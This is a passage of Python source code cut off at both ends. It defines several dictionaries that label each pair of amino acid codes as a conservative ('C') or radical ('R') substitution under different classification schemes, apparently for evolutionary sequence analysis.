",("P","V"):"R",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"R",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"C",("C","D"):"R",("Q","D"):"C",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"C",("C","E"):"R",("Q","E"):"C",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"C",("I","A"):"R",("L","A"):"R",("M","A"):"R",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"R",("C","N"):"R",("Q","N"):"C",("G","N"):"R",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"R",("T","N"):"R",("W","N"):"R",("Y","N"):"R",("V","N"):"R",("Q","C"):"R",("G","C"):"R",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"R",("T","C"):"R",("W","C"):"R",("Y","C"):"R",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"R",("T","Q"):"R",("W","Q"):"R",("Y","Q"):"R",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"R",("S","I"):"R",("T","I"):"R",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"R",("S","L"):"R",("T","L"):"R",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"R",("S","M"):"R",("T","M"):"R",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"C",("T","F"):"C",("W","F"):"R",("Y","F"):"R",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"R",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"R",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict4 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"C",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"C",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"C",("R","Y"):"C",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"C",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"C",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"C",("H","Y"):"C",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"C",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"C",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"C",("K","Y"):"C",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"R",("A","G"):"C",("A","I"):"R",("A","L"):"R",("A","M"):"R",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"R",("N","C"):"C",("N","Q"):"R",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"R",("N","V"):"R",("C","Q"):"R",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"R",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"C",("Q","P"):"R",("Q","S"):"R",("Q","T"):"R",("Q","W"):"C",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"R",("I","S"):"R",("I","T"):"R",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"R",("L","S"):"R",("L","T"):"R",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"R",("M","S"):"R",("M","T"):"R",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"C",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"R",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"R",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"C",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"C",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"C",("Y","R"):"C",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"C",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"C",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"C",("Y","H"):"C",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"C",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"C",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"C",("Y","K"):"C",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"R",("G","A"):"C",("I","A"):"R",("L","A"):"R",("M","A"):"R",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"R",("C","N"):"C",("Q","N"):"R",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"R",("V","N"):"R",("Q","C"):"R",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"R",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"C",("P","Q"):"R",("S","Q"):"R",("T","Q"):"R",("W","Q"):"C",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"R",("S","I"):"R",("T","I"):"R",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"R",("S","L"):"R",("T","L"):"R",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"R",("S","M"):"R",("T","M"):"R",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"C",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"R",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"R",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict5 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"C",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"C",("N","L"):"C",("N","M"):"C",("N","F"):"R",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"R",("N","V"):"C",("C","Q"):"C",("C","G"):"C",("C","I"):"C",("C","L"):"C",("C","M"):"C",("C","F"):"R",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"R",("C","V"):"C",("Q","G"):"C",("Q","I"):"C",("Q","L"):"C",("Q","M"):"C",("Q","F"):"R",("Q","P"):"C",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"R",("Q","V"):"C",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"C",("I","S"):"C",("I","T"):"C",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"C",("L","S"):"C",("L","T"):"C",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"C",("M","S"):"C",("M","T"):"C",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"C",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"C",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"C",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"C",("L","N"):"C",("M","N"):"C",("F","N"):"R",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"R",("V","N"):"C",("Q","C"):"C",("G","C"):"C",("I","C"):"C",("L","C"):"C",("M","C"):"C",("F","C"):"R",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"R",("V","C"):"C",("G","Q"):"C",("I","Q"):"C",("L","Q"):"C",("M","Q"):"C",("F","Q"):"R",("P","Q"):"C",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"R",("V","Q"):"C",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"C",("S","I"):"C",("T","I"):"C",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"C",("S","L"):"C",("T","L"):"C",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"C",("S","M"):"C",("T","M"):"C",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"C",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"C",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict6 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"R",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"R",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"C",("G","P"):"C",("G","S"):"R",("G","T"):"R",("G","W"):"C",("G","Y"):"R",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"R",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"R",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"C",("P","G"):"C",("S","G"):"R",("T","G"):"R",("W","G"):"C",("Y","G"):"R",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict7 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"R",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"C",("Q","I"